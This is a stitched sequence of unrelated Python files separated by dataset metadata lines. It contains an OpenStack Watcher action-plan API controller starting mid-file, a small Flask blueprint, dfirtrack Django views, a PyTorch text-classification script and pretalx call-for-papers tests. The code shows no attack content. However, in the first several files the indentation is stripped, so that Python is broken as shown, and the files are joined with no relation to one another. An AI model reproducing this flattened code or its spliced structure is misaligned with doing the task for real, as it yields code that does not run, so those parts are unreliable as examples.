"""The global efficacy of this action plan"""
state = wtypes.text
"""This action plan state"""
links = wtypes.wsattr([link.Link], readonly=True)
"""A list containing a self link and associated action links"""
hostname = wtypes.wsattr(wtypes.text, mandatory=False)
"""Hostname the actionplan is running on"""
def __init__(self, **kwargs):
super(ActionPlan, self).__init__()
self.fields = []
fields = list(objects.ActionPlan.fields)
for field in fields:
# Skip fields we do not expose.
if not hasattr(self, field):
continue
self.fields.append(field)
setattr(self, field, kwargs.get(field, wtypes.Unset))
self.fields.append('audit_uuid')
self.fields.append('efficacy_indicators')
setattr(self, 'audit_uuid', kwargs.get('audit_id', wtypes.Unset))
fields.append('strategy_uuid')
setattr(self, 'strategy_uuid', kwargs.get('strategy_id', wtypes.Unset))
fields.append('strategy_name')
setattr(self, 'strategy_name', kwargs.get('strategy_id', wtypes.Unset))
@staticmethod
def _convert_with_links(action_plan, url, expand=True):
if not expand:
action_plan.unset_fields_except(
['uuid', 'state', 'efficacy_indicators', 'global_efficacy',
'updated_at', 'audit_uuid', 'strategy_uuid', 'strategy_name'])
action_plan.links = [
link.Link.make_link(
'self', url,
'action_plans', action_plan.uuid),
link.Link.make_link(
'bookmark', url,
'action_plans', action_plan.uuid,
bookmark=True)]
return action_plan
@classmethod
def convert_with_links(cls, rpc_action_plan, expand=True):
action_plan = ActionPlan(**rpc_action_plan.as_dict())
hide_fields_in_newer_versions(action_plan)
return cls._convert_with_links(action_plan, pecan.request.host_url,
expand)
@classmethod
def sample(cls, expand=True):
sample = cls(uuid='9ef4d84c-41e8-4418-9220-ce55be0436af',
state='ONGOING',
created_at=datetime.datetime.utcnow(),
deleted_at=None,
updated_at=datetime.datetime.utcnow())
sample._audit_uuid = 'abcee106-14d3-4515-b744-5a26885cf6f6'
sample._efficacy_indicators = [{'description': 'Test indicator',
'name': 'test_indicator',
'unit': '%'}]
sample._global_efficacy = {'description': 'Global efficacy',
'name': 'test_global_efficacy',
'unit': '%'}
return cls._convert_with_links(sample, 'http://localhost:9322', expand)
class ActionPlanCollection(collection.Collection):
"""API representation of a collection of action_plans."""
action_plans = [ActionPlan]
"""A list containing action_plans objects"""
def __init__(self, **kwargs):
self._type = 'action_plans'
@staticmethod
def convert_with_links(rpc_action_plans, limit, url=None, expand=False,
**kwargs):
ap_collection = ActionPlanCollection()
ap_collection.action_plans = [ActionPlan.convert_with_links(
p, expand) for p in rpc_action_plans]
ap_collection.next = ap_collection.get_next(limit, url=url, **kwargs)
return ap_collection
@classmethod
def sample(cls):
sample = cls()
sample.action_plans = [ActionPlan.sample(expand=False)]
return sample
class ActionPlansController(rest.RestController):
"""REST controller for Actions."""
def __init__(self):
super(ActionPlansController, self).__init__()
self.applier_client = rpcapi.ApplierAPI()
from_actionsPlans = False
"""A flag to indicate if the requests to this controller are coming
from the top-level resource ActionPlan."""
_custom_actions = {
'start': ['POST'],
'detail': ['GET']
}
def _get_action_plans_collection(self, marker, limit,
sort_key, sort_dir, expand=False,
resource_url=None, audit_uuid=None,
strategy=None):
additional_fields = ['audit_uuid', 'strategy_uuid', 'strategy_name']
api_utils.validate_sort_key(
sort_key, list(objects.ActionPlan.fields) + additional_fields)
limit = api_utils.validate_limit(limit)
api_utils.validate_sort_dir(sort_dir)
marker_obj = None
if marker:
marker_obj = objects.ActionPlan.get_by_uuid(
pecan.request.context, marker)
filters = {}
if audit_uuid:
filters['audit_uuid'] = audit_uuid
if strategy:
if utils.is_uuid_like(strategy):
filters['strategy_uuid'] = strategy
else:
filters['strategy_name'] = strategy
need_api_sort = api_utils.check_need_api_sort(sort_key,
additional_fields)
sort_db_key = (sort_key if not need_api_sort
else None)
action_plans = objects.ActionPlan.list(
pecan.request.context,
limit,
marker_obj, sort_key=sort_db_key,
sort_dir=sort_dir, filters=filters)
action_plans_collection = ActionPlanCollection.convert_with_links(
action_plans, limit, url=resource_url, expand=expand,
sort_key=sort_key, sort_dir=sort_dir)
if need_api_sort:
api_utils.make_api_sort(action_plans_collection.action_plans,
sort_key, sort_dir)
return action_plans_collection
@wsme_pecan.wsexpose(ActionPlanCollection, types.uuid, int, wtypes.text,
wtypes.text, types.uuid, wtypes.text)
def get_all(self, marker=None, limit=None,
sort_key='id', sort_dir='asc', audit_uuid=None, strategy=None):
"""Retrieve a list of action plans.
:param marker: pagination marker for large data sets.
:param limit: maximum number of resources to return in a single result.
:param sort_key: column to sort results by. Default: id.
:param sort_dir: direction to sort. "asc" or "desc". Default: asc.
:param audit_uuid: Optional UUID of an audit, to get only actions
for that audit.
:param strategy: strategy UUID or name to filter by
"""
context = pecan.request.context
policy.enforce(context, 'action_plan:get_all',
action='action_plan:get_all')
return self._get_action_plans_collection(
marker, limit, sort_key, sort_dir,
audit_uuid=audit_uuid, strategy=strategy)
@wsme_pecan.wsexpose(ActionPlanCollection, types.uuid, int, wtypes.text,
wtypes.text, types.uuid, wtypes.text)
def detail(self, marker=None, limit=None,
sort_key='id', sort_dir='asc', audit_uuid=None, strategy=None):
"""Retrieve a list of action_plans with detail.
:param marker: pagination marker for large data sets.
:param limit: maximum number of resources to return in a single result.
:param sort_key: column to sort results by. Default: id.
:param sort_dir: direction to sort. "asc" or "desc". Default: asc.
:param audit_uuid: Optional UUID of an audit, to get only actions
for that audit.
:param strategy: strategy UUID or name to filter by
"""
context = pecan.request.context
policy.enforce(context, 'action_plan:detail',
action='action_plan:detail')
        # NOTE(lucasagomes): /detail should only work against collections
parent = pecan.request.path.split('/')[:-1][-1]
if parent != "action_plans":
raise exception.HTTPNotFound
expand = True
resource_url = '/'.join(['action_plans', 'detail'])
return self._get_action_plans_collection(
marker, limit, sort_key, sort_dir, expand,
resource_url, audit_uuid=audit_uuid, strategy=strategy)
@wsme_pecan.wsexpose(ActionPlan, types.uuid)
def get_one(self, action_plan_uuid):
"""Retrieve information about the given action plan.
        :param action_plan_uuid: UUID of an action plan.
"""
if self.from_actionsPlans:
raise exception.OperationNotPermitted
context = pecan.request.context
action_plan = api_utils.get_resource('ActionPlan', action_plan_uuid)
policy.enforce(
context, 'action_plan:get', action_plan, action='action_plan:get')
return ActionPlan.convert_with_links(action_plan)
@wsme_pecan.wsexpose(None, types.uuid, status_code=HTTPStatus.NO_CONTENT)
def delete(self, action_plan_uuid):
"""Delete an action plan.
        :param action_plan_uuid: UUID of an action plan.
"""
context = pecan.request.context
action_plan = api_utils.get_resource(
'ActionPlan', action_plan_uuid, eager=True)
policy.enforce(context, 'action_plan:delete', action_plan,
action='action_plan:delete')
allowed_states = (ap_objects.State.SUCCEEDED,
ap_objects.State.RECOMMENDED,
ap_objects.State.FAILED,
ap_objects.State.SUPERSEDED,
ap_objects.State.CANCELLED)
if action_plan.state not in allowed_states:
raise exception.DeleteError(
state=action_plan.state)
action_plan.soft_delete()
@wsme.validate(types.uuid, [ActionPlanPatchType])
@wsme_pecan.wsexpose(ActionPlan, types.uuid,
body=[ActionPlanPatchType])
def patch(self, action_plan_uuid, patch):
"""Update an existing action plan.
        :param action_plan_uuid: UUID of an action plan.
:param patch: a json PATCH document to apply to this action plan.
"""
if self.from_actionsPlans:
raise exception.OperationNotPermitted
context = pecan.request.context
action_plan_to_update = api_utils.get_resource(
'ActionPlan', action_plan_uuid, eager=True)
policy.enforce(context, 'action_plan:update', action_plan_to_update,
action='action_plan:update')
try:
action_plan_dict = action_plan_to_update.as_dict()
action_plan = ActionPlan(**api_utils.apply_jsonpatch(
action_plan_dict, patch))
except api_utils.JSONPATCH_EXCEPTIONS as e:
raise exception.PatchError(patch=patch, reason=e)
launch_action_plan = False
cancel_action_plan = False
# transitions that are allowed via PATCH
allowed_patch_transitions = [
(ap_objects.State.RECOMMENDED,
ap_objects.State.PENDING),
(ap_objects.State.RECOMMENDED,
ap_objects.State.CANCELLED),
(ap_objects.State.ONGOING,
ap_objects.State.CANCELLING),
(ap_objects.State.PENDING,
ap_objects.State.CANCELLED),
]
# todo: improve this in blueprint watcher-api-validation
if hasattr(action_plan, 'state'):
transition = (action_plan_to_update.state, action_plan.state)
if transition not in allowed_patch_transitions:
error_message = _("State transition not allowed: "
"(%(initial_state)s -> %(new_state)s)")
raise exception.PatchError(
patch=patch,
reason=error_message % dict(
initial_state=action_plan_to_update.state,
new_state=action_plan.state))
if action_plan.state == ap_objects.State.PENDING:
launch_action_plan = True
if action_plan.state == ap_objects.State.CANCELLED:
cancel_action_plan = True
# Update only the fields that have changed
for field in objects.ActionPlan.fields:
try:
patch_val = getattr(action_plan, field)
except AttributeError:
# Ignore fields that aren't exposed in the API
continue
if patch_val == wtypes.Unset:
patch_val = None
if action_plan_to_update[field] != patch_val:
action_plan_to_update[field] = patch_val
if (field == 'state' and
patch_val == objects.action_plan.State.PENDING):
launch_action_plan = True
action_plan_to_update.save()
# NOTE: if action plan is cancelled from pending or recommended
# state update action state here only
if cancel_action_plan:
filters = {'action_plan_uuid': action_plan.uuid}
actions = objects.Action.list(pecan.request.context,
filters=filters, eager=True)
for a in actions:
a.state = objects.action.State.CANCELLED
a.save()
if launch_action_plan:
self.applier_client.launch_action_plan(pecan.request.context,
action_plan.uuid)
action_plan_to_update = objects.ActionPlan.get_by_uuid(
pecan.request.context,
action_plan_uuid)
return ActionPlan.convert_with_links(action_plan_to_update)
@wsme_pecan.wsexpose(ActionPlan, types.uuid)
def start(self, action_plan_uuid, **kwargs):
"""Start an action_plan
:param action_plan_uuid: UUID of an action_plan.
"""
action_plan_to_start = api_utils.get_resource(
'ActionPlan', action_plan_uuid, eager=True)
context = pecan.request.context
policy.enforce(context, 'action_plan:start', action_plan_to_start,
action='action_plan:start')
if action_plan_to_start['state'] != \
objects.action_plan.State.RECOMMENDED:
raise exception.StartError(
state=action_plan_to_start.state)
action_plan_to_start['state'] = objects.action_plan.State.PENDING
action_plan_to_start.save()
self.applier_client.launch_action_plan(pecan.request.context,
action_plan_uuid)
action_plan_to_start = objects.ActionPlan.get_by_uuid(
pecan.request.context, action_plan_uuid)
return ActionPlan.convert_with_links(action_plan_to_start)
| 1.46875 | 1 |
controllers/albums.py | jeonginlee/groove_scheduler | 0 | 1166 | <reponame>jeonginlee/groove_scheduler
from flask import *
albums = Blueprint('albums', __name__, template_folder='templates')
@albums.route('/albums/edit')
def albums_edit_route():
options = {
"edit": True
}
return render_template("albums.html", **options)
@albums.route('/albums')
def albums_route():
options = {
"edit": False
}
return render_template("albums.html", **options) | 2.171875 | 2 |
Incident-Response/Tools/dfirtrack/dfirtrack_main/views/division_views.py | sn0b4ll/Incident-Playbook | 1 | 1167 | <filename>Incident-Response/Tools/dfirtrack/dfirtrack_main/views/division_views.py
from django.contrib import messages
from django.contrib.auth.mixins import LoginRequiredMixin
from django.shortcuts import redirect, render
from django.urls import reverse
from django.views.generic import DetailView, ListView
from django.views.generic.edit import CreateView, UpdateView
from dfirtrack_main.forms import DivisionForm
from dfirtrack_main.logger.default_logger import debug_logger
from dfirtrack_main.models import Division
class DivisionList(LoginRequiredMixin, ListView):
login_url = '/login'
model = Division
template_name = 'dfirtrack_main/division/division_list.html'
context_object_name = 'division_list'
def get_queryset(self):
debug_logger(str(self.request.user), " DIVISION_LIST_ENTERED")
return Division.objects.order_by('division_name')
class DivisionDetail(LoginRequiredMixin, DetailView):
login_url = '/login'
model = Division
template_name = 'dfirtrack_main/division/division_detail.html'
def get_context_data(self, **kwargs):
context = super().get_context_data(**kwargs)
division = self.object
division.logger(str(self.request.user), " DIVISION_DETAIL_ENTERED")
return context
class DivisionCreate(LoginRequiredMixin, CreateView):
login_url = '/login'
model = Division
form_class = DivisionForm
template_name = 'dfirtrack_main/division/division_add.html'
def get(self, request, *args, **kwargs):
form = self.form_class()
debug_logger(str(request.user), " DIVISION_ADD_ENTERED")
return render(request, self.template_name, {'form': form})
def post(self, request, *args, **kwargs):
form = self.form_class(request.POST)
if form.is_valid():
division = form.save(commit=False)
division.save()
division.logger(str(request.user), " DIVISION_ADD_EXECUTED")
messages.success(request, 'Division added')
return redirect(reverse('division_detail', args=(division.division_id,)))
else:
return render(request, self.template_name, {'form': form})
class DivisionUpdate(LoginRequiredMixin, UpdateView):
login_url = '/login'
model = Division
form_class = DivisionForm
template_name = 'dfirtrack_main/division/division_edit.html'
def get(self, request, *args, **kwargs):
division = self.get_object()
form = self.form_class(instance=division)
division.logger(str(request.user), " DIVISION_EDIT_ENTERED")
return render(request, self.template_name, {'form': form})
def post(self, request, *args, **kwargs):
division = self.get_object()
form = self.form_class(request.POST, instance=division)
if form.is_valid():
division = form.save(commit=False)
division.save()
division.logger(str(request.user), " DIVISION_EDIT_EXECUTED")
messages.success(request, 'Division edited')
return redirect(reverse('division_detail', args=(division.division_id,)))
else:
return render(request, self.template_name, {'form': form})
| 1.953125 | 2 |
run.py | shark803/Torch_serve_example_NLP | 1 | 1168 | # coding: UTF-8
import time
import torch
import numpy as np
from train_eval import train, init_network
from importlib import import_module
import argparse
parser = argparse.ArgumentParser(description='Chinese Text Classification')
parser.add_argument('--model', type=str, required=True, help='choose a model: TextCNN')
parser.add_argument('--embedding', default='pre_trained', type=str, help='random or pre_trained')
parser.add_argument('--word', default=False, type=bool, help='True for word, False for char')
args = parser.parse_args()
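# Example invocation (illustrative, using the arguments defined above):
#   python run.py --model TextCNN --embedding pre_trained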
if __name__ == '__main__':
    dataset = 'THUCNews'  # dataset directory
    # Sogou News: embedding_SougouNews.npz, Tencent: embedding_Tencent.npz, random initialization: random
# embedding = 'random'
model_name = args.model # TextCNN
from utils import build_dataset, build_iterator, get_time_dif
x = import_module('models.' + model_name)
from config import Config
config = Config(dataset)
np.random.seed(1)
torch.manual_seed(1)
torch.cuda.manual_seed_all(1)
    torch.backends.cudnn.deterministic = True  # make results reproducible across runs
start_time = time.time()
print("Loading data...")
vocab, train_data, dev_data, test_data = build_dataset(config, args.word)
train_iter = build_iterator(train_data, config)
dev_iter = build_iterator(dev_data, config)
test_iter = build_iterator(test_data, config)
time_dif = get_time_dif(start_time)
print("Time usage:", time_dif)
# train
config.n_vocab = len(vocab)
model = x.Model().to(config.device)
init_network(model)
print(model.parameters)
train(config, model, train_iter, dev_iter, test_iter)
| 2.5 | 2 |
src/tests/cfp/views/test_cfp_user.py | xhub/pretalx | 0 | 1169 | <filename>src/tests/cfp/views/test_cfp_user.py
import pytest
from django.conf import settings
from django.core import mail as djmail
from django.core.files.uploadedfile import SimpleUploadedFile
from django.urls import reverse
from django_scopes import scope
from rest_framework.authtoken.models import Token
from pretalx.submission.models import SubmissionStates
@pytest.mark.django_db
def test_can_see_submission_list(speaker_client, submission):
response = speaker_client.get(submission.event.urls.user_submissions, follow=True)
assert response.status_code == 200
assert submission.title in response.content.decode()
@pytest.mark.django_db
def test_can_see_submission(speaker_client, submission):
response = speaker_client.get(submission.urls.user_base, follow=True)
assert response.status_code == 200
assert submission.title in response.content.decode()
@pytest.mark.django_db
def test_cannot_see_other_submission(speaker_client, other_submission):
response = speaker_client.get(other_submission.urls.user_base, follow=True)
assert response.status_code == 404
@pytest.mark.django_db
def test_can_confirm_submission(speaker_client, accepted_submission):
response = speaker_client.get(accepted_submission.urls.confirm, follow=True)
accepted_submission.refresh_from_db()
assert response.status_code == 200
assert accepted_submission.state == SubmissionStates.ACCEPTED
response = speaker_client.post(accepted_submission.urls.confirm, follow=True)
accepted_submission.refresh_from_db()
assert response.status_code == 200
assert accepted_submission.state == SubmissionStates.CONFIRMED
@pytest.mark.django_db
def test_can_reconfirm_submission(speaker_client, accepted_submission):
accepted_submission.state = SubmissionStates.CONFIRMED
accepted_submission.save()
response = speaker_client.get(accepted_submission.urls.confirm, follow=True)
accepted_submission.refresh_from_db()
assert response.status_code == 200
assert accepted_submission.state == SubmissionStates.CONFIRMED
@pytest.mark.django_db
def test_cannot_confirm_rejected_submission(other_speaker_client, rejected_submission):
rejected_submission.state = SubmissionStates.REJECTED
rejected_submission.save()
response = other_speaker_client.get(rejected_submission.urls.confirm, follow=True)
rejected_submission.refresh_from_db()
assert response.status_code == 200
assert rejected_submission.state == SubmissionStates.REJECTED
@pytest.mark.django_db
def test_can_withdraw_submission(speaker_client, submission):
response = speaker_client.get(submission.urls.withdraw, follow=True)
submission.refresh_from_db()
assert response.status_code == 200
assert submission.state == SubmissionStates.SUBMITTED
response = speaker_client.post(submission.urls.withdraw, follow=True)
submission.refresh_from_db()
assert response.status_code == 200
assert submission.state == SubmissionStates.WITHDRAWN
@pytest.mark.django_db
def test_cannot_withdraw_accepted_submission(speaker_client, accepted_submission):
response = speaker_client.get(accepted_submission.urls.withdraw, follow=True)
accepted_submission.refresh_from_db()
assert response.status_code == 200
assert accepted_submission.state == SubmissionStates.ACCEPTED
@pytest.mark.django_db
def test_can_edit_submission(speaker_client, submission, resource, other_resource):
with scope(event=submission.event):
assert submission.resources.count() == 2
resource_one = submission.resources.first()
resource_two = submission.resources.last()
assert submission.title in str(resource_one)
f = SimpleUploadedFile('testfile.txt', b'file_content')
data = {
'title': 'Ein ganz neuer Titel',
'submission_type': submission.submission_type.pk,
'content_locale': submission.content_locale,
'description': submission.description,
'abstract': submission.abstract,
'notes': submission.notes,
'slot_count': submission.slot_count,
'resource-0-id': resource_one.id,
'resource-0-description': 'new resource name',
'resource-0-resource': resource_one.resource,
'resource-1-id': resource_two.id,
'resource-1-DELETE': True,
'resource-1-description': resource_two.description,
'resource-1-resource': resource_two.resource,
'resource-2-id': '',
'resource-2-description': 'new resource',
'resource-2-resource': f,
'resource-TOTAL_FORMS': 3,
'resource-INITIAL_FORMS': 2,
'resource-MIN_NUM_FORMS': 0,
'resource-MAX_NUM_FORMS': 1000,
}
response = speaker_client.post(submission.urls.user_base, follow=True, data=data)
assert response.status_code == 200
with scope(event=submission.event):
assert submission.resources.count() == 2
submission.refresh_from_db()
resource_one.refresh_from_db()
new_resource = submission.resources.exclude(pk=resource_one.pk).first()
assert submission.title == 'Ein ganz neuer Titel', response.content.decode()
assert submission.resources.count() == 2
assert new_resource.description == 'new resource'
assert new_resource.resource.read() == b'file_content'
assert not submission.resources.filter(pk=resource_two.pk).exists()
@pytest.mark.django_db
def test_can_edit_slot_count(speaker_client, submission):
with scope(event=submission.event):
submission.event.settings.present_multiple_times = True
data = {
'title': 'Ein ganz neuer Titel',
'submission_type': submission.submission_type.pk,
'content_locale': submission.content_locale,
'description': submission.description,
'abstract': submission.abstract,
'notes': submission.notes,
'slot_count': 13,
'resource-TOTAL_FORMS': 0,
'resource-INITIAL_FORMS': 0,
'resource-MIN_NUM_FORMS': 0,
'resource-MAX_NUM_FORMS': 1000,
}
response = speaker_client.post(submission.urls.user_base, follow=True, data=data)
assert response.status_code == 200
with scope(event=submission.event):
submission.refresh_from_db()
assert submission.slot_count == 13
@pytest.mark.django_db
def test_cannot_edit_confirmed_slot_count(speaker_client, confirmed_submission):
submission = confirmed_submission
submission.event.settings.present_multiple_times = True
with scope(event=submission.event):
data = {
'title': 'Ein ganz neuer Titel',
'submission_type': submission.submission_type.pk,
'content_locale': submission.content_locale,
'description': submission.description,
'abstract': submission.abstract,
'notes': submission.notes,
'slot_count': 13,
'resource-TOTAL_FORMS': 0,
'resource-INITIAL_FORMS': 0,
'resource-MIN_NUM_FORMS': 0,
'resource-MAX_NUM_FORMS': 1000,
}
response = speaker_client.post(submission.urls.user_base, follow=True, data=data)
assert response.status_code == 200
with scope(event=submission.event):
submission.refresh_from_db()
assert submission.slot_count != 13
@pytest.mark.django_db
def test_cannot_edit_rejected_submission(other_speaker_client, rejected_submission):
title = rejected_submission.title
data = {
'title': 'Ein ganz neuer Titel',
'submission_type': rejected_submission.submission_type.pk,
'content_locale': rejected_submission.content_locale,
'description': rejected_submission.description,
'abstract': rejected_submission.abstract,
'notes': rejected_submission.notes,
'resource-TOTAL_FORMS': 0,
'resource-INITIAL_FORMS': 0,
'resource-MIN_NUM_FORMS': 0,
'resource-MAX_NUM_FORMS': 1000,
}
response = other_speaker_client.post(
rejected_submission.urls.user_base, follow=True, data=data
)
assert response.status_code == 200
rejected_submission.refresh_from_db()
assert rejected_submission.title == title
@pytest.mark.django_db
def test_can_edit_submission_type(speaker_client, submission, event):
with scope(event=submission.event):
new_type = event.submission_types.create(name='Other', default_duration=13)
data = {
'title': 'Ein ganz neuer Titel',
'submission_type': new_type.pk,
'content_locale': submission.content_locale,
'description': submission.description,
'abstract': submission.abstract,
'notes': submission.notes,
'resource-TOTAL_FORMS': 0,
'resource-INITIAL_FORMS': 0,
'resource-MIN_NUM_FORMS': 0,
'resource-MAX_NUM_FORMS': 1000,
}
response = speaker_client.post(submission.urls.user_base, follow=True, data=data)
assert response.status_code == 200
with scope(event=submission.event):
submission.refresh_from_db()
assert submission.submission_type == new_type
@pytest.mark.django_db
def test_cannot_edit_submission_type_after_acceptance(speaker_client, submission, event):
with scope(event=submission.event):
submission.accept()
new_type = event.submission_types.create(name='Other', default_duration=13)
data = {
'title': 'Ein ganz neuer Titel',
'submission_type': new_type.pk,
'content_locale': submission.content_locale,
'description': submission.description,
'abstract': submission.abstract,
'notes': submission.notes,
'resource-TOTAL_FORMS': 0,
'resource-INITIAL_FORMS': 0,
'resource-MIN_NUM_FORMS': 0,
'resource-MAX_NUM_FORMS': 1000,
}
response = speaker_client.post(submission.urls.user_base, follow=True, data=data)
assert response.status_code == 200
with scope(event=submission.event):
submission.refresh_from_db()
assert submission.submission_type != new_type
@pytest.mark.django_db
def test_can_edit_profile(speaker, event, speaker_client):
response = speaker_client.post(
event.urls.user,
data={
'name': '<NAME>',
'biography': 'Ruling since forever.',
'form': 'profile',
},
follow=True,
)
assert response.status_code == 200
with scope(event=event):
speaker.refresh_from_db()
assert speaker.profiles.get(event=event).biography == 'Ruling since forever.'
assert speaker.name == '<NAME>'
@pytest.mark.django_db
def test_can_change_api_token(speaker, event, speaker_client):
speaker.regenerate_token()
old_token = Token.objects.filter(user=speaker).first().key
response = speaker_client.post(
event.urls.user,
data={
'form': 'token',
},
follow=True,
)
assert response.status_code == 200
new_token = Token.objects.filter(user=speaker).first().key
assert new_token != old_token
@pytest.mark.django_db
def test_must_provide_availabilities(speaker, event, speaker_client):
event.settings.cfp_require_availabilities = True
response = speaker_client.post(
event.urls.user,
data={
'name': '<NAME>',
'biography': 'Ruling since forever.',
'form': 'profile',
},
follow=True,
)
assert response.status_code == 200
with scope(event=event):
speaker.refresh_from_db()
assert speaker.profiles.get(event=event).biography != 'Ruling since forever.'
response = speaker_client.post(
event.urls.user,
data={
'name': '<NAME>',
'biography': 'Ruling since forever.',
'form': 'profile',
'availabilities': '{"availabilities": []}',
},
follow=True,
)
assert response.status_code == 200
with scope(event=event):
speaker.refresh_from_db()
assert speaker.profiles.get(event=event).biography != 'Ruling since forever.'
@pytest.mark.django_db
def test_can_edit_login_info(speaker, event, speaker_client):
response = speaker_client.post(
event.urls.user,
data={
'old_password': '<PASSWORD>!',
'email': '<EMAIL>',
'password': '',
'password_repeat': '',
'form': 'login',
},
follow=True,
)
assert response.status_code == 200
speaker.refresh_from_db()
assert speaker.email == '<EMAIL>'
@pytest.mark.django_db
def test_can_edit_login_info_wrong_password(speaker, event, speaker_client):
response = speaker_client.post(
event.urls.user,
data={
'old_password': '<PASSWORD>!',
'email': '<EMAIL>',
'password': '',
'password_repeat': '',
'form': 'login',
},
follow=True,
)
assert response.status_code == 200
speaker.refresh_from_db()
assert speaker.email != '<EMAIL>'
@pytest.mark.django_db
def test_can_edit_and_update_speaker_answers(
speaker,
event,
speaker_question,
speaker_boolean_question,
speaker_client,
speaker_text_question,
speaker_file_question,
):
with scope(event=event):
answer = speaker.answers.filter(question_id=speaker_question.pk).first()
assert not answer
f = SimpleUploadedFile('testfile.txt', b'file_content')
response = speaker_client.post(
event.urls.user,
data={
f'question_{speaker_question.id}': 'black as the night',
f'question_{speaker_boolean_question.id}': 'True',
f'question_{speaker_file_question.id}': f,
f'question_{speaker_text_question.id}': 'Green is totally the best color.',
'form': 'questions',
},
follow=True,
)
assert response.status_code == 200
with scope(event=event):
answer = speaker.answers.get(question_id=speaker_question.pk)
assert answer.answer == 'black as the night'
assert speaker.answers.get(question_id=speaker_boolean_question.pk).answer == 'True'
assert (
speaker.answers.get(question_id=speaker_text_question.pk).answer
== 'Green is totally the best color.'
)
file_answer = speaker.answers.get(question_id=speaker_file_question.pk)
assert file_answer.answer.startswith('file://')
assert file_answer.answer_file.read() == b'file_content'
assert (settings.MEDIA_ROOT / file_answer.answer_file.name).exists()
response = speaker_client.post(
event.urls.user,
data={
f'question_{speaker_question.id}': 'green as the sky',
'form': 'questions',
},
follow=True,
)
assert response.status_code == 200
with scope(event=event):
answer.refresh_from_db()
assert answer.answer == 'green as the sky'
@pytest.mark.django_db
def test_cannot_delete_profile_on_first_try(speaker, event, speaker_client):
with scope(event=event):
assert speaker.profiles.get(event=event).biography != ''
response = speaker_client.post(event.urls.user_delete, follow=True)
assert response.status_code == 200
with scope(event=event):
speaker.refresh_from_db()
assert speaker.profiles.get(event=event).biography != ''
assert speaker.name != '<NAME>'
@pytest.mark.django_db
def test_can_delete_profile(speaker, event, speaker_client):
with scope(event=event):
assert speaker.profiles.get(event=event).biography != ''
response = speaker_client.post(
event.urls.user_delete, data={'really': True}, follow=True
)
assert response.status_code == 200
with scope(event=event):
speaker.refresh_from_db()
assert speaker.profiles.get(event=event).biography == ''
assert speaker.name == '<NAME>'
assert speaker.email.startswith('deleted_user')
assert speaker.email.endswith('@localhost')
@pytest.mark.django_db
def test_can_change_locale(multilingual_event, client):
first_response = client.get(multilingual_event.cfp.urls.public, follow=True)
assert 'submission' in first_response.content.decode()
assert 'Einreichung' not in first_response.content.decode()
second_response = client.get(
reverse('cfp:locale.set', kwargs={'event': multilingual_event.slug})
+ f'?locale=de&next=/{multilingual_event.slug}/',
follow=True,
)
assert 'Einreichung' in second_response.content.decode()
@pytest.mark.django_db
def test_persists_changed_locale(multilingual_event, orga_user, orga_client):
assert orga_user.locale == 'en'
response = orga_client.get(
reverse('cfp:locale.set', kwargs={'event': multilingual_event.slug})
+ f'?locale=de&next=/{multilingual_event.slug}/',
follow=True,
)
orga_user.refresh_from_db()
assert response.status_code == 200
assert orga_user.locale == 'de'
@pytest.mark.django_db
def test_can_invite_speaker(speaker_client, submission):
djmail.outbox = []
response = speaker_client.get(
submission.urls.invite, follow=True, data={'email': 'invalidemail'}
)
assert response.status_code == 200
data = {
'speaker': '<EMAIL>',
'subject': 'Please join!',
'text': 'C\'mon, it will be fun!',
}
response = speaker_client.post(submission.urls.invite, follow=True, data=data)
assert response.status_code == 200
assert len(djmail.outbox) == 1
assert djmail.outbox[0].to == ['<EMAIL>']
@pytest.mark.django_db
def test_can_accept_invitation(orga_client, submission):
assert submission.speakers.count() == 1
response = orga_client.post(submission.urls.accept_invitation, follow=True)
submission.refresh_from_db()
assert response.status_code == 200
assert submission.speakers.count() == 2
@pytest.mark.django_db
def test_wrong_acceptance_link(orga_client, submission):
assert submission.speakers.count() == 1
response = orga_client.post(
submission.urls.accept_invitation + 'olololol', follow=True
)
submission.refresh_from_db()
assert response.status_code == 404
assert submission.speakers.count() == 1
@pytest.mark.django_db
@pytest.mark.parametrize('request_availability', (True, False))
def test_submission_accept(speaker_client, submission, request_availability):
submission.event.settings.cfp_request_availabilities = request_availability
submission.state = SubmissionStates.ACCEPTED
submission.save()
response = speaker_client.post(submission.urls.confirm, follow=True)
submission.refresh_from_db()
assert response.status_code == 200
assert submission.state == SubmissionStates.CONFIRMED
@pytest.mark.django_db
def test_submission_accept_with_missing_availability(speaker_client, submission):
submission.event.settings.cfp_request_availabilities = True
submission.event.settings.cfp_require_availabilities = True
submission.state = SubmissionStates.ACCEPTED
submission.save()
response = speaker_client.post(submission.urls.confirm, follow=True)
submission.refresh_from_db()
assert response.status_code == 200
assert submission.state == SubmissionStates.ACCEPTED
@pytest.mark.django_db
def test_submission_accept_nologin(client, submission):
submission.state = SubmissionStates.ACCEPTED
submission.save()
response = client.post(submission.urls.confirm, follow=True)
submission.refresh_from_db()
assert response.status_code == 200
assert response.redirect_chain[-1][1] == 302
assert 'login/?next=' in response.redirect_chain[-1][0]
assert submission.state == SubmissionStates.ACCEPTED
@pytest.mark.django_db
def test_submission_accept_wrong_code(client, submission):
submission.state = SubmissionStates.ACCEPTED
submission.save()
assert submission.code in submission.urls.confirm
response = client.post(
submission.urls.confirm.replace(submission.code, "foo"), follow=True
)
assert response.status_code == 200
assert response.redirect_chain[-1][1] == 302
assert 'login/?next=' in response.redirect_chain[-1][0]
@pytest.mark.django_db
def test_submission_withdraw(speaker_client, submission):
djmail.outbox = []
submission.state = SubmissionStates.SUBMITTED
submission.save()
response = speaker_client.post(submission.urls.withdraw, follow=True)
assert response.status_code == 200
submission.refresh_from_db()
assert submission.state == SubmissionStates.WITHDRAWN
assert len(djmail.outbox) == 0
@pytest.mark.django_db
def test_submission_withdraw_if_accepted(speaker_client, submission):
djmail.outbox = []
with scope(event=submission.event):
submission.accept()
response = speaker_client.post(submission.urls.withdraw, follow=True)
assert response.status_code == 200
with scope(event=submission.event):
submission.refresh_from_db()
assert submission.state == SubmissionStates.WITHDRAWN
assert len(djmail.outbox) == 1
@pytest.mark.django_db
def test_submission_withdraw_if_confirmed(speaker_client, submission):
with scope(event=submission.event):
submission.accept()
submission.confirm()
response = speaker_client.post(submission.urls.withdraw, follow=True)
assert response.status_code == 200
with scope(event=submission.event):
submission.refresh_from_db()
assert submission.state != SubmissionStates.WITHDRAWN
@pytest.mark.django_db
def test_submission_withdraw_if_rejected(speaker_client, submission):
with scope(event=submission.event):
submission.reject()
response = speaker_client.post(submission.urls.withdraw, follow=True)
assert response.status_code == 200
with scope(event=submission.event):
submission.refresh_from_db()
assert submission.state != SubmissionStates.WITHDRAWN
| 1.976563 | 2 |
